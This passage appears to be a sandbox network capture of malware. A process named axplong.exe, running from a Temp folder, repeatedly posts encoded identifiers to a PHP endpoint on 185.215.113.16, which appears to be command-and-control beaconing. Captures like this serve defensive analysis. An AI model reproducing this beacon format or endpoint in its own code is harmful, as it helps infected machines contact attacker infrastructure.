Jul 26, 2024 20:59:47.022134066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:47.023183107 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:47.272697926 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	51119	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:47.382014036 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:48.151751995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:48.152791977 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:48.405695915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	51120	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:48.526061058 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:49.558984041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:49.559909105 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:49.562638044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:49.814817905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	51121	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:49.929337025 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:50.692059040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:50.693114996 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:50.941869020 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	51122	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:51.053700924 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:51.823230028 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:51.824547052 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:52.074811935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	51123	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:52.194534063 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:52.985714912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:52.989514112 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:53.243582964 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	51124	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:53.350646019 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:54.135282993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:54.136408091 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:54.388052940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	51125	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:54.506972075 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:55.269821882 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:55.270775080 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:55.520315886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	51126	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:55.631990910 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:56.370784998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:56.371906042 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:56.615612984 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	51127	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:56.725807905 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:57.661175966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:57.661989927 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:57.922636986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	51128	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:58.041457891 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:58.842703104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:58.843723059 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:59.092746019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	51129	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:59.224313974 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:59.969131947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:59.970283031 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:00.215368032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	51130	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:00.335089922 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:01.144354105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
